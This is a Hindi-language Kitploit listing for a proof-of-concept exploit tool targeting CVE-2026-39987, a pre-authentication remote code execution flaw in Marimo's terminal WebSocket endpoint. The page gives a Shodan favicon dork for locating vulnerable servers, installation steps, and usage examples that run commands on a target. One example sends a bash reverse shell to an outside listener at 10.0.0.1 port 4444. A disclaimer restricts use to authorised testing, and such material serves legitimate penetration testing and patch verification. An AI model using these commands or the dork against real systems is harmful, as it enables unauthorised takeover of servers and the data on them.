Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 शोषण उपकरण - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) | Kitploit
उपकरण/GitHubGitHub/m3ph1569/cve-2026-39987-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 शोषण उपकरण - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39987 - Marimo < 0.23.0 प्री-प्रमाणीकरण RCE (वेबसॉकेट)

CVSS Severity Python License

Marimo के 0.23.0 से पहले के संस्करणों में एक गंभीर प्री-प्रमाणीकरण रिमोट कोड निष्पादन (RCE) कमजोरी के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट।

यह कमजोरी एक अप्रमाणित हमलावर को वेबसॉकेट एंडपॉइंट (/terminal/ws) से जुड़ने और लक्ष्य सर्वर पर मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है।

विशेषताएँ

  • स्वचालित सत्यापन: स्वचालित रूप से लक्ष्य में कमजोरी की जाँच करता है, संस्करण की पहचान करके और Marimo एप्लिकेशन की उपस्थिति (फ़ेविकॉन और /api/version एंडपॉइंट के माध्यम से) सत्यापित करता है।
  • एकल कमांड निष्पादन: लक्ष्य पर एक एकल कमांड भेजें और आउटपुट प्राप्त करें।
  • इंटरैक्टिव शेल: लक्ष्य के साथ सहज बातचीत के लिए एक छद्म-इंटरैक्टिव स्थायी शेल बनाएँ।
  • रिवर्स शेल जनरेशन: रिवर्स शेल पेलोड उत्पन्न करने और निष्पादित करने के लिए अंतर्निहित समर्थन।
  • सत्यापन बायपास: उन वातावरणों के लिए --no-check फ्लैग के साथ संस्करण और उपस्थिति जाँच को बायपास करने की क्षमता जहाँ एंडपॉइंट छिपे हो सकते हैं।

Shodan / FOFA डॉर्क

संभावित रूप से कमजोर उदाहरणों की पहचान करने के लिए आप निम्न डॉर्क का उपयोग कर सकते हैं:

root@kitploit:~
http.favicon.hash:-1864630356

स्थापना

निर्भरताएँ स्थापित करने के लिए Python आभासी वातावरण का उपयोग करने की अनुशंसा की जाती है।

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC

# 2. Create and activate a virtual environment
python -m venv .CVE-2026-39987

# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate

# 3. Upgrade pip and Install required dependencies
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt

उपयोग

root@kitploit:~
usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]

positional arguments:
  target               Target URL (e.g. http://localhost:8080)
  command              Command to execute (omit when using -i)

options:
  -h, --help           show this help message and exit
  --no-check           Skip vulnerability version check

Execution modes:
  -i, --interactive    Interactive shell mode
  --revshell IP PORT   Generate & send a bash reverse shell payload

WebSocket tuning:
  --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
  --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
  --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)

Reconnect options:
  --max-retries N      Max auto-reconnect attempts (default: 5)
  --no-reconnect       Disable auto-reconnect on unexpected disconnect

उदाहरण

1. एकल कमांड चलाएँ:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "id"

2. इंटरैक्टिव शेल शुरू करें:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 -i

3. रिवर्स शेल निष्पादित करें: सुनिश्चित करें कि आपकी मशीन पर netcat लिसनर चल रहा है (जैसे, nc -lvnp 4444)।

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444

4. सत्यापन जाँच छोड़ें और बलपूर्वक निष्पादन करें:

root@kitploit:~
python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check

योगदान

योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट जमा करें।

  1. रिपॉजिटरी को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएँ (git checkout -b feature/update-feature)
  3. अपने बदलावों को कमिट करें (git commit -m 'Add update feature')
  4. ब्रांच पर पुश करें (git push origin feature/update-feature)
  5. पुल रिक्वेस्ट खोलें

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत नैतिक हैकिंग के लिए है। लेखक इस स्क्रिप्ट के कारण होने वाले किसी भी दुरुपयोग, क्षति या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास सिस्टम स्वामी से स्पष्ट अनुमति है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है और कानून द्वारा दंडनीय है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


☕︎ के साथ बनाया गया M3PH1569 द्वारा
टूल डाउनलोड करें